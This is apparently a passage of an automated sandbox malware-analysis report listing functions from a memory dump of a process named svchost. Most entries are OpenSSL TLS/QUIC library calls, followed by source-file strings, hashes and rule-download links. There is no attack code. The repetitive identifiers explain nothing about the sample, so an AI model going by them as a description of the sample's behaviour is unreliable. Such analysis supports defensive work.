                                                                                                • Part of subcall function 00007FFBAB463040: OPENSSL_LH_new.LIBCRYPTO-3-X64(?,?,?,00007FFBAB45AD0F,?,00007FFBAB4523E0), ref: 00007FFBAB463158
                                                                                                • Part of subcall function 00007FFBAB463040: OPENSSL_LH_set_thunks.LIBCRYPTO-3-X64(?,?,?,00007FFBAB45AD0F,?,00007FFBAB4523E0), ref: 00007FFBAB46317A
                                                                                                • Part of subcall function 00007FFBAB45A910: CRYPTO_zalloc.LIBCRYPTO-3-X64(?,00007FFBAB45AD25,?,00007FFBAB4523E0), ref: 00007FFBAB45A94B
                                                                                                • Part of subcall function 00007FFBAB45A910: OPENSSL_LH_new.LIBCRYPTO-3-X64(?,00007FFBAB45AD25,?,00007FFBAB4523E0), ref: 00007FFBAB45A96A
                                                                                                • Part of subcall function 00007FFBAB45A910: OPENSSL_LH_set_thunks.LIBCRYPTO-3-X64(?,00007FFBAB45AD25,?,00007FFBAB4523E0), ref: 00007FFBAB45A993
                                                                                                • Part of subcall function 00007FFBAB45A910: OPENSSL_LH_new.LIBCRYPTO-3-X64(?,00007FFBAB45AD25,?,00007FFBAB4523E0), ref: 00007FFBAB45A9AF
                                                                                                • Part of subcall function 00007FFBAB45A910: OPENSSL_LH_set_thunks.LIBCRYPTO-3-X64(?,00007FFBAB45AD25,?,00007FFBAB4523E0), ref: 00007FFBAB45A9D8
                                                                                              • CRYPTO_free.LIBCRYPTO-3-X64(?,00007FFBAB4523E0), ref: 00007FFBAB45AD97
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_newH_set_thunksO_zalloc$O_ctrl$D_priv_bytes_exE_newO_freeR_fetchR_freeX_new
                                                                                              • String ID: ssl\quic\quic_port.c
                                                                                              • API String ID: 3589639851-1976217255
                                                                                              • Opcode ID: 928cec6c32ab5be4a987b75ebc2569a50e9d0d168862d4145900d74124cd2c77
                                                                                              • Instruction ID: 60a8ad7ab0d5dd6896b70eab2ce25ef4de8f77214983d57d1b1bbcc9058ad6cd
                                                                                              • Opcode Fuzzy Hash: 928cec6c32ab5be4a987b75ebc2569a50e9d0d168862d4145900d74124cd2c77
                                                                                              • Instruction Fuzzy Hash: 88414AB2A06F8281EB56EF39D45076833A1EB48B84F188239DE5D073B5EF38D856C340
                                                                                              Function 00007FFBAB42A330 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 74COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_free$O_memdup
                                                                                              • String ID: ssl\ssl_lib.c
                                                                                              • API String ID: 3545228654-1984206432
                                                                                              • Opcode ID: e28ed7ef171393cabcf1bdfd1322e3f6585cd7ea4a742a719508bb1bad48ad07
                                                                                              • Instruction ID: 2479fffc8fe701b228ace0b7648bc50e49493e02001eedbfa4365ebd9df3a0c5
                                                                                              • Opcode Fuzzy Hash: e28ed7ef171393cabcf1bdfd1322e3f6585cd7ea4a742a719508bb1bad48ad07
                                                                                              • Instruction Fuzzy Hash: 2721A861B1A7E241EFA5CF35E44467D3394EF45B84F089039EE5D47BA9CE2CD8518702
                                                                                              Function 00007FFBAB4641B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • OPENSSL_LH_retrieve.LIBCRYPTO-3-X64(?,00007FFBAB450198,00000000,00007FFBAB458275,?,00000000,?,?,?,00007FFBAB45358D), ref: 00007FFBAB4641E3
                                                                                              • CRYPTO_zalloc.LIBCRYPTO-3-X64(?,00007FFBAB450198,00000000,00007FFBAB458275,?,00000000,?,?,?,00007FFBAB45358D), ref: 00007FFBAB464202
                                                                                              • OPENSSL_LH_insert.LIBCRYPTO-3-X64(?,00007FFBAB450198,00000000,00007FFBAB458275,?,00000000,?,?,?,00007FFBAB45358D), ref: 00007FFBAB46428D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_insertH_retrieveO_zalloc
                                                                                              • String ID: ssl\quic\quic_stream_map.c
                                                                                              • API String ID: 2203104954-1155244460
                                                                                              • Opcode ID: d080b82876c34c2d23674a372ebbb6f9a750eb8f6499852c943e0ccd3190e5cd
                                                                                              • Instruction ID: 1004f94571e8a8ad95581585037129d6dfefc8eb670af9523b196b835b9f2214
                                                                                              • Opcode Fuzzy Hash: d080b82876c34c2d23674a372ebbb6f9a750eb8f6499852c943e0ccd3190e5cd
                                                                                              • Instruction Fuzzy Hash: 1121E472A09B4285EB56CB35D4513E92790EB587D4F14C238DEBC837E5DE38E451C340
                                                                                              Function 00007FFBAB424A72 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 68COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_free$O_memdup
                                                                                              • String ID: ssl\ssl_lib.c
                                                                                              • API String ID: 3545228654-1984206432
                                                                                              • Opcode ID: 8ae493308588188c1086bbee4f7fc03183cd3bcc5c0eb1f562b8535bad2dc9fd
                                                                                              • Instruction ID: 8a23336690390fe20690e81ec46edbfe39484a68da36768e4fba82675af6d128
                                                                                              • Opcode Fuzzy Hash: 8ae493308588188c1086bbee4f7fc03183cd3bcc5c0eb1f562b8535bad2dc9fd
                                                                                              • Instruction Fuzzy Hash: A3212B65B1ABD181E752CB32D4813BC7B95EF84B84F489135DE5D87B69CF2CD4528700
                                                                                              Function 00007FFBAB43C9A0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_free$O_malloc
                                                                                              • String ID: ssl\t1_lib.c
                                                                                              • API String ID: 2767441526-1168734446
                                                                                              • Opcode ID: d23f743535099a2c4ecc3846e82c0b1f0123525a9993317514069fe0cc3b4e20
                                                                                              • Instruction ID: fba1c6c68bed9e824ab7d8023e3c5e467d86e6b323cb28bf2a5eb17c26991578
                                                                                              • Opcode Fuzzy Hash: d23f743535099a2c4ecc3846e82c0b1f0123525a9993317514069fe0cc3b4e20
                                                                                              • Instruction Fuzzy Hash: 0521CF7370ABA181E752DB26D54026DA7A0EB45BC0F48D131EEAC43BAAEF3DE551C740
                                                                                              Function 00007FFBAB4521E0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 49COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_ctrl$O_zalloc
                                                                                              • String ID: ssl\quic\quic_demux.c
                                                                                              • API String ID: 870977572-194952269
                                                                                              • Opcode ID: 3d7659c4accdafd210d96943375ed6b1722b6f630bbf6f50d0c13c28fe6df9c0
                                                                                              • Instruction ID: 9cd2cddc070da9bab412468a195dd1d70b043e36bb7cc2d508d08870b39852c4
                                                                                              • Opcode Fuzzy Hash: 3d7659c4accdafd210d96943375ed6b1722b6f630bbf6f50d0c13c28fe6df9c0
                                                                                              • Instruction Fuzzy Hash: 3A116072609B92C6E761DB21E941A697BA4FB84BC4F498235EE5C43F75CF38E815CB00
                                                                                              Function 00007FFBAB482880 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 40COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CRYPTO_free.LIBCRYPTO-3-X64(?,00007FFBAB41D131,?,00007FFBAB423B73,?,00007FFBAB4273AB,?,00007FFBAB457F02,?,00007FFBAB453609), ref: 00007FFBAB4828CB
                                                                                              • CRYPTO_free.LIBCRYPTO-3-X64(?,00007FFBAB41D131,?,00007FFBAB423B73,?,00007FFBAB4273AB,?,00007FFBAB457F02,?,00007FFBAB453609), ref: 00007FFBAB4828E1
                                                                                              • CRYPTO_free.LIBCRYPTO-3-X64(?,00007FFBAB41D131,?,00007FFBAB423B73,?,00007FFBAB4273AB,?,00007FFBAB457F02,?,00007FFBAB453609), ref: 00007FFBAB482908
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_free
                                                                                              • String ID: ssl\statem\extensions_cust.c
                                                                                              • API String ID: 2581946324-1564674317
                                                                                              • Opcode ID: 7b54ba3a8a63aac01c81fb89d9ba8360a4a97c98200f84916bd5334e8dfc14e2
                                                                                              • Instruction ID: b27a816c079352dcee5a37ac60794c3a751046747ac848e8725167a5ca03f6fe
                                                                                              • Opcode Fuzzy Hash: 7b54ba3a8a63aac01c81fb89d9ba8360a4a97c98200f84916bd5334e8dfc14e2
                                                                                              • Instruction Fuzzy Hash: D51130B1A5AB9281EB519B65F88036D6360FB84B84F448136EFAD07B65DF7CD144C740
                                                                                              Function 00007FFBAB412940 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_freeO_zalloc_beginthreadex
                                                                                              • String ID: crypto\thread\arch\thread_win.c
                                                                                              • API String ID: 1240409343-2915021490
                                                                                              • Opcode ID: 423ff864966eef510864d7505c4d9208903451e2d65eb1c1581e94dce3132e98
                                                                                              • Instruction ID: 9ec89fb2680603b966927cb0408295a889d1808ddea4d4ec7bb9772385230ce7
                                                                                              • Opcode Fuzzy Hash: 423ff864966eef510864d7505c4d9208903451e2d65eb1c1581e94dce3132e98
                                                                                              • Instruction Fuzzy Hash: 58019EB1B1A75282EB12CB25F8453A963B4FB48788F488136DE9C47BA5EF3CE554C700
                                                                                              Function 00007FFBAB46A850 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 37COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_free
                                                                                              • String ID: ssl\quic\quic_txpim.c
                                                                                              • API String ID: 2581946324-1264249673
                                                                                              • Opcode ID: bfd892b1b6ed01ebceaa0872bc2514d2b7dd38eb631ac1bedfc8bde7a82d7930
                                                                                              • Instruction ID: 7e7024a19f728840d3134b576689814575e6a03fd6fe9a4e89c3ae0641632fc2
                                                                                              • Opcode Fuzzy Hash: bfd892b1b6ed01ebceaa0872bc2514d2b7dd38eb631ac1bedfc8bde7a82d7930
                                                                                              • Instruction Fuzzy Hash: 4B0171B2B1BB9281EF52DB21E8802B86764EB44BC0F48A035EF5D07B65DE3CD5458701
                                                                                              Function 00007FFBAB490AD0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 22COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CRYPTO_free.LIBCRYPTO-3-X64(?,00007FFBAB414CA1,?,?,?,00007FFBAB414A5D), ref: 00007FFBAB490AF5
                                                                                              • CRYPTO_free.LIBCRYPTO-3-X64(?,00007FFBAB414CA1,?,?,?,00007FFBAB414A5D), ref: 00007FFBAB490B0B
                                                                                              • CRYPTO_free.LIBCRYPTO-3-X64(?,00007FFBAB414CA1,?,?,?,00007FFBAB414A5D), ref: 00007FFBAB490B20
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_free
                                                                                              • String ID: ssl\statem\statem_dtls.c
                                                                                              • API String ID: 2581946324-3166991913
                                                                                              • Opcode ID: a85e4b783e4a8bcea3a9faee574f95fad5154aeaaeb760acb57dd1e667d27870
                                                                                              • Instruction ID: bf3dbac929e0c267840542f26173918a5300b7a59ef2f8fbcd494a0c93df88cc
                                                                                              • Opcode Fuzzy Hash: a85e4b783e4a8bcea3a9faee574f95fad5154aeaaeb760acb57dd1e667d27870
                                                                                              • Instruction Fuzzy Hash: C5F030E1F5611395EE16DB79C8C26BC1711EF45B81F448435DE2D07762ED1ED609C701
                                                                                              Function 00007FFBAB430450 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_free$Y_free
                                                                                              • String ID: ssl\ssl_lib.c
                                                                                              • API String ID: 3642664693-1984206432
                                                                                              • Opcode ID: 6d0946d844a4db522dc917eab90d6050f22cb33342ced9b0e25f45acba3a926a
                                                                                              • Instruction ID: 0f3cdb236f135d2c48a6115c9da95e88792015e20decd85b219aeec3c5967cd1
                                                                                              • Opcode Fuzzy Hash: 6d0946d844a4db522dc917eab90d6050f22cb33342ced9b0e25f45acba3a926a
                                                                                              • Instruction Fuzzy Hash: 9FE09AE1B4751290EE22EB72D8C22B823209F44B80F449031DD2C477B2CE1CE99AC302
                                                                                              Function 00007FFBAB458120 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 138COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CRYPTO_free.LIBCRYPTO-3-X64(?,00000000,?,?,?,00007FFBAB45358D), ref: 00007FFBAB4582F9
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_free
                                                                                              • String ID: quic_conn_stream_new$ssl\quic\quic_impl.c
                                                                                              • API String ID: 2581946324-333456876
                                                                                              • Opcode ID: 185f3fa660f183b42e7f7ec6cb34732e5eddf49efa50fefa90d903e706a91fc1
                                                                                              • Instruction ID: 1f3ec326ff638d0a6f5deda5ed81bd30354c928935aa4760ab94c28eea53a510
                                                                                              • Opcode Fuzzy Hash: 185f3fa660f183b42e7f7ec6cb34732e5eddf49efa50fefa90d903e706a91fc1
                                                                                              • Instruction Fuzzy Hash: B151E7B1A1EE4652FA26D732E94067A6B90FF44B84F048235EF6D477A5DF3CE8118701
                                                                                              Function 00007FFBAB420130 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 101COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CRYPTO_zalloc.LIBCRYPTO-3-X64(?,?,00000000,00007FFBAB420040), ref: 00007FFBAB420194
                                                                                              • CRYPTO_free.LIBCRYPTO-3-X64(?,?,00000000,00007FFBAB420040), ref: 00007FFBAB42025B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_freeO_zalloc
                                                                                              • String ID: ssl\ssl_ciph.c
                                                                                              • API String ID: 2237658545-1912280922
                                                                                              • Opcode ID: 81d8cf1528eb5d46c0f51a58f17a8be05794b480d16a1a5dcec022ef63581fdf
                                                                                              • Instruction ID: 934691cdfba5be66fd7ceb6cf63a8563afb8f3c5491c1932d31b6649b4ef272c
                                                                                              • Opcode Fuzzy Hash: 81d8cf1528eb5d46c0f51a58f17a8be05794b480d16a1a5dcec022ef63581fdf
                                                                                              • Instruction Fuzzy Hash: 31418DB2A0AB4182EA56CF65E5802797BA1FB45FC0F55C436DE2C47761EF39E980C341
                                                                                              Function 00007FFBAB426190 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 89COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_freeO_malloc
                                                                                              • String ID: ssl\ssl_lib.c
                                                                                              • API String ID: 2609694610-1984206432
                                                                                              • Opcode ID: b92507850ed99600fc392696fa79ea4498c001a015ad090ddabc56f520770637
                                                                                              • Instruction ID: a4fb99237f9e8618d0a246362ab78b8801d8121d9ba63bfcedd5260006a5c2e6
                                                                                              • Opcode Fuzzy Hash: b92507850ed99600fc392696fa79ea4498c001a015ad090ddabc56f520770637
                                                                                              • Instruction Fuzzy Hash: B031CEB2B0BB5182FA92DF65D0942B833A0FB54B84F588436CE2D877A4DF39E4429311
                                                                                              Function 00007FFBAB4249F0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 71COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_freeO_memdup
                                                                                              • String ID: ssl\ssl_lib.c
                                                                                              • API String ID: 3962629258-1984206432
                                                                                              • Opcode ID: 38e1baf42bfe177be3940a0fd97c351b1f0ca28f8af4cfbb817061fe19b10ed1
                                                                                              • Instruction ID: 8e2240e40adeab930d3d81177e653ad6149f09b277f2bfcd77c0e12f534da38f
                                                                                              • Opcode Fuzzy Hash: 38e1baf42bfe177be3940a0fd97c351b1f0ca28f8af4cfbb817061fe19b10ed1
                                                                                              • Instruction Fuzzy Hash: 8F21F1A1F4B78380EE628A63E1443786599AF54BC4F08C435DEAC43BA5DD2DD5425300
                                                                                              Function 00007FFBAB412C60 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CRYPTO_zalloc.LIBCRYPTO-3-X64 ref: 00007FFBAB412C9E
                                                                                                • Part of subcall function 00007FFBAB412860: CRYPTO_zalloc.LIBCRYPTO-3-X64 ref: 00007FFBAB41287D
                                                                                              • CRYPTO_free.LIBCRYPTO-3-X64 ref: 00007FFBAB412D3F
                                                                                                • Part of subcall function 00007FFBAB412860: InitializeCriticalSection.KERNEL32 ref: 00007FFBAB412893
                                                                                                • Part of subcall function 00007FFBAB412460: CRYPTO_malloc.LIBCRYPTO-3-X64 ref: 00007FFBAB41247F
                                                                                                • Part of subcall function 00007FFBAB412940: CRYPTO_zalloc.LIBCRYPTO-3-X64 ref: 00007FFBAB412964
                                                                                                • Part of subcall function 00007FFBAB412940: _beginthreadex.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFBAB412990
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
